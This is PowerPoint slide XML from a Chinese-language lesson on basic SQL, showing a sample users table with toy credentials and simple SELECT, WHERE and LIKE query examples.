          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4114212207"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7054791" y="1456745"/>
          <a:ext cx="4166695" cy="2315448"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="555505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217910847"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289602206"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2781414587"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2334648633"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Admin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2527666147"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Bob</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>123</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="656364240"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>user1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>pass1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2831422024"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{254790F6-CE6C-4676-B0C7-CDCC245BAC30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010387" y="4994908"/>
            <a:ext cx="6603393" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>from users where username='Admin';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE108E5-5B4C-403C-AEBF-2732870FDAE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1035060" y="5516878"/>
            <a:ext cx="5014287" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>from users where id&gt;1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24AFA601-4641-4F89-8CDC-57B4DC8C93AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572785" y="3508978"/>
            <a:ext cx="752265" cy="474727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31CB2A8D-3ABC-48F1-AB6A-09D00050F790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590957" y="1635224"/>
            <a:ext cx="997017" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>格式：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3243546171"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391776" y="363006"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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pc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675054" y="628441"/>
            <a:ext cx="3447063" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8E35212-D512-4A99-8389-6CDF23717816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1950098" y="1291200"/>
            <a:ext cx="3375001" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>模糊查询（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>LIKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE36105F-7A47-405B-B64E-A0ACAF875848}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920926" y="2243921"/>
            <a:ext cx="7221763" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>列名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>xxx;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0454E7AD-8FC0-477B-A9FA-8957036ADF2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8525970" y="912761"/>
            <a:ext cx="1028578" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5348A91-592C-41EB-B75D-6BF7291150C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3500634854"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7046616" y="1317029"/>
          <a:ext cx="4166695" cy="2315448"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="555505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217910847"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
